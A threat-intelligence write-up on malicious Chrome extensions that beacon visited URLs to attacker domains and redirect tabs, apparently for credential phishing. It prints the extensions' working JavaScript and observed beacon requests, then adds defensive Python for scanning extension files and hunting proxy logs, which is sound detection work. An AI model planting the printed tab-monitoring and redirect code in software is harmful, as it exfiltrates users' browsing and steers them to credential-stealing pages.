*Published: 7/11/2025*

> **High-level Overview:** Following the publication from [Koi Security](https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5), multiple infections have been dug up. Further analysis of the behavior uncovered more infections and infrastructure. Based on the observed POST requests made from infected endpoints, this campaign appears to be rewriting pages and harvesting credentials.

## Delivery

This is chalked up to end users installing extensions in their browser. The developer's extension is either:

1. Hijacked by the threat actor (TA)
2. Paid directly by the threat actor(s) to inject the malicious JavaScript
3. Paid to transfer ownership of the extension, after which the malicious JavaScript is injected

I suspect that across the sprawling browser extension ecosystem, there is a healthy mix of all three.

## Actions-on-Objective

No hands-on-keyboard activity is noted at the time of writing. The campaign appears to be harvesting credentials and session details directly via the browser. Follow-on behavior could include hijacking the user's sessions and brokering valid account access, which could theoretically lead to deployment of malware loaders or ransomware; however, this **has not yet** been observed.

## Extension Analysis

While the first reported blog post attributed this behavior to a campaign dubbed **RedDirection**, the abused browser extension ecosystem is immense. As more infrastructure and extensions have been uncovered from our single environment alone, the attribution to a single campaign quickly falls into murky water. The extensions performing the same behavior (hardcoded API tokens, beaconing out with said token) had various naming conventions for the underlying JavaScript files.
In one example with the **Flash Player for Chrome** extension, `autoredirect.js` monitors all tab URL changes and sends them to `ebmitab[.]com` for redirection instructions, communicating with the browser's tab system to update or create new tabs based on server responses.

![[flashplayer_extension.png]]

In this example, you can see that the API token was hardcoded in this snippet:

```javascript
const domain = "ebmitab.com",
      key = "8103ac6a6cf87fc2ce402bab0a6c5af9684be942", // <-- Hardcoded API token with domain
      lnkOpts = { keepTab: !0 };

chrome.tabs.onUpdated.addListener((async (e, t, a) => {
  if (t.url) {
    let c = { method: "POST", redirect: "follow" };
    // Every visited URL is sent to the hardcoded domain; the reply decides where the tab goes next
    const n = await fetch(`https://${domain}/api?key=${key}&allowempty=1&out=` + encodeURIComponent(t.url) + "&format=txt&r=" + Math.random(), c)
      .then((e => e.text()))
      .then((e => !(!e || !e.match(/^http/i)) && e))
      .catch((e => !1));
    n && n.match(/^http/i) && (lnkOpts.keepTab
      ? chrome.tabs.update(e, { url: n }, (() => {}))
      : chrome.tabs.create({ active: a.active, index: a.index, url: n, windowId: a.windowId, pinned: a.pinned }, (() => { chrome.tabs.remove(e, (() => {})) })));
  }
}));
```

---

In our observations with other extensions such as **SearchGPT**, there was a different JavaScript file named `worker.js`.

![[searchgpt_extension.png]]

The following code snippet is the heart of the extension's malicious behavior, responsible for monitoring and manipulating visited websites from the victim's browser.
```javascript
chrome.tabs.onUpdated.addListener((async (e, t, r) => {
  if (t.url) {
    let n = { method: "POST", redirect: "follow" };
    // Beacon: the visited URL goes out with the hardcoded key; a URL in the reply triggers a redirect
    const o = await fetch("https://abmitab.com/api?key=bec78b49f48a58c8bf22a3c59dc82e5151a089a1&allowempty=1&out=" + encodeURIComponent(t.url) + "&format=txt&r=" + Math.random(), n)
      .then((e => e.text()))
      .then((e => !(!e || !e.match(/^http/i)) && e))
      .catch((e => !1));
    o && o.match(/^http/i) && chrome.tabs.update(e, { url: o }, (() => {}));
  }
}));
```

It sets up a listener that fires every time a browser tab changes, such as when the victim visits a new website or refreshes a page. The parameters `e`, `t`, and `r` are the tab ID, the details of the change (such as the URL), and the tab object itself, respectively. The code then builds the web request, with the API key and the attacker's domain hardcoded. After sending the visited URL, the code waits for the server's response and converts it to text (`e.text()`). It then checks whether the response is a URL starting with http or https (`e.match(/^http/i)`). If the response isn't a valid URL or an error occurs, the chain yields false. The result is stored in `o`, which holds either a new URL or false.

If the server returns a valid URL (stored in `o`), the last line redirects the browser tab to that URL using `chrome.tabs.update`. For instance, if you were on chat.openai.com/chat and the server responded with https://fake-chat-openai.com/login, the browser would be immediately redirected to the fake site, which could mimic ChatGPT's login page to trick the victim into entering their credentials.
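As an added example (not code from the original post or from either extension), the following Python scanner looks for the traits described above in extension scripts: a `tabs.onUpdated` listener, an `/api?key=` beacon URL carrying a 40-character hex token, and the visited URL passed through `encodeURIComponent` as the `out=` parameter. The sample scripts, the scoring threshold of two indicators, and the directory-walk helper are my assumptions.

```python
import re
from pathlib import Path

# Constructed sample scripts (not files from the post): two mirror the beaconing pattern
# described above, the third is a harmless tab listener that must not be flagged.
SAMPLES = {
    "worker.js": 'chrome.tabs.onUpdated.addListener((async (e, t, r) => { if (t.url) { '
                 'const o = await fetch("https://abmitab.com/api?key=bec78b49f48a58c8bf22a3c59dc82e5151a089a1'
                 '&allowempty=1&out=" + encodeURIComponent(t.url) + "&format=txt", { method: "POST" }); } }));',
    "autoredirect.js": 'const domain="ebmitab.com",key="8103ac6a6cf87fc2ce402bab0a6c5af9684be942";'
                       'chrome.tabs.onUpdated.addListener((async(e,t,a)=>{ await fetch(`https://${domain}/api?key=${key}'
                       '&out=`+encodeURIComponent(t.url),{method:"POST"}) }));',
    "benign.js": 'chrome.tabs.onUpdated.addListener((id, info) => { if (info.status === "complete") console.log(id); });',
}

# Each indicator is scored on its own; the verdict needs at least two, so a plain
# tabs.onUpdated listener (common in legitimate extensions) is not enough by itself.
TAB_LISTENER = re.compile(r"chrome\.tabs\.onUpdated\.addListener")
BEACON_URL = re.compile(r"/api\?key=(?:[0-9a-f]{40}|\$\{key\})")              # literal token or template variable
URL_EXFIL = re.compile(r"out=[\"'`]?\s*\+?\s*encodeURIComponent\(\w+\.url\)")  # visited URL sent as out=
HEX_TOKEN = re.compile(r"(?:key=|key\s*=\s*[\"'])([0-9a-f]{40})")              # hardcoded 40-hex API token
DOMAIN = re.compile(r"(?:https://|domain\s*=\s*[\"'])([a-z0-9.-]+\.[a-z]{2,})")  # beacon domain, literal or const


def scan_script(name: str, source: str) -> dict:
    """Return the indicators, tokens and beacon domains found in one extension script."""
    hits = [label for pattern, label in (
        (TAB_LISTENER, "tabs.onUpdated listener"),
        (BEACON_URL, "/api?key= beacon URL"),
        (URL_EXFIL, "visited URL exfiltrated via out="),
    ) if pattern.search(source)]
    return {"file": name, "indicators": hits, "keys": sorted(set(HEX_TOKEN.findall(source))),
            "domains": sorted(set(DOMAIN.findall(source))), "suspicious": len(hits) >= 2}


def scan_extension_dir(root: str) -> list:
    """Scan every .js file under an unpacked extension directory and keep the suspicious ones."""
    return [r for p in Path(root).rglob("*.js")
            if (r := scan_script(str(p), p.read_text(errors="ignore")))["suspicious"]]


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(scan_script(name, src))
```

Point `scan_extension_dir` at a profile's Extensions folder to triage every installed extension; the returned records give the token and domain to pivot on in proxy logs.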
## Analysis into the POST Requests

The POST requests to the infrastructure all contain the pattern `/api?key=`. Here are some example POST requests that were observed in my environment:

- `POST ebmitab[.]com/api?key=[hardcoded_api]&allowempty=1&out=https://organization.okta[.]com/login/token/redirect?stateToken=`
- `POST addmitab[.]com/api?key=[hardcoded_api]&allowempty=1&out=https://mail.google[.]com/mail/u/0/#inbox&`

Due to the widespread nature of these infections, it should be emphasized to look at the behavior rather than static IOCs. As highlighted above, the infrastructure is likely far more sprawling than initially reported. A hunt for static IOCs will largely be self-defeating.

## Remediation Steps

- Remove the malicious extension
- Reset all credentials for the affected user
- Clear all browser artifacts (cache, sessions, cookies, history)
- Flush the DNS cache
- Restart the host to clear volatile memory

## Conclusion

This situation begets a dilemma: is it a potentially unwanted program (PUP) that should be ignored for the sanity of responders? Do we need to take further mitigations to prevent and detect this behavior? Will swatting at the endless hordes of static IOCs solve this problem?

My opinion is that this needs to be remedied sooner rather than later. At its best, it's a fraudulent code injection that performs beaconing and harvests credentials. At its worst, it could be a time bomb, operating as an initial access broker auctioning off valid accounts. Mitigations should include stricter browser controls along with whitelisting valid extensions, a hardening feature which most organizations do not have. The main difficulty with this attack vector is that what is benign today could be malicious tomorrow.

That said, I hope that this inspires some queries targeting POST requests with hardcoded API tokens, along with searches for embedded API tokens within JavaScript files in extension directories. Happy hunting!
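As an added example (not from the original post), here is the behavioral hunt the POST-request section and the conclusion call for, run over constructed proxy log lines: a request is flagged on the `/api?key=<40 hex>&...&out=<visited URL>` shape alone, so a beacon to a domain that is not on any IOC list (the constructed `never-seen-before.example` below) is caught the same way as the known ones. The log format, client addresses and domains are my assumptions.

```python
from urllib.parse import urlsplit, parse_qs
import re

# Constructed proxy log lines (not from the post): "<time> <client> <method> <url> <status>".
# Three beacons, one of them to a domain no IOC list would contain, plus two unrelated requests.
PROXY_LOG = """\
2025-07-11T09:12:01Z 10.0.0.5 POST https://ebmitab.com/api?key=8103ac6a6cf87fc2ce402bab0a6c5af9684be942&allowempty=1&out=https://organization.okta.com/login/token/redirect?stateToken=&format=txt&r=0.42 200
2025-07-11T09:12:07Z 10.0.0.5 POST https://addmitab.com/api?key=8103ac6a6cf87fc2ce402bab0a6c5af9684be942&allowempty=1&out=https%3A%2F%2Fmail.google.com%2Fmail%2Fu%2F0%2F%23inbox&format=txt&r=0.13 200
2025-07-11T09:13:44Z 10.0.0.9 POST https://never-seen-before.example/api?key=bec78b49f48a58c8bf22a3c59dc82e5151a089a1&allowempty=1&out=https%3A%2F%2Fintranet.example%2Fsso&format=txt&r=0.77 200
2025-07-11T09:14:02Z 10.0.0.9 GET https://weather.example/api?key=abc123&city=Oslo 200
2025-07-11T09:14:30Z 10.0.0.5 POST https://files.example/upload?session=9f2c 204
"""

HEX40 = re.compile(r"^[0-9a-f]{40}$")


def is_beacon(method: str, url: str) -> bool:
    """Behavioral match: POST to /api carrying a 40-hex key plus the visited URL in out=.
    The destination domain is deliberately not part of the test, so unseen infrastructure still matches."""
    if method != "POST":
        return False
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    key = q.get("key", [""])[0]
    out = q.get("out", [""])[0]
    return parts.path == "/api" and bool(HEX40.match(key)) and out.startswith(("http://", "https://"))


def hunt(log_text: str) -> list:
    """Return one record per beacon: the client, the beacon domain, the token and the leaked page URL."""
    found = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, _status = line.split(" ", 4)
        if is_beacon(method, url):
            parts = urlsplit(url)
            q = parse_qs(parts.query, keep_blank_values=True)
            found.append({"time": ts, "client": client, "domain": parts.hostname,
                          "key": q["key"][0], "leaked_url": q["out"][0]})
    return found


if __name__ == "__main__":
    for rec in hunt(PROXY_LOG):
        print(rec)
```

The `leaked_url` field shows what the victim was looking at when the beacon fired, which is what turns a single hit into a credential-reset decision (an Okta state token or a mailbox in the example above).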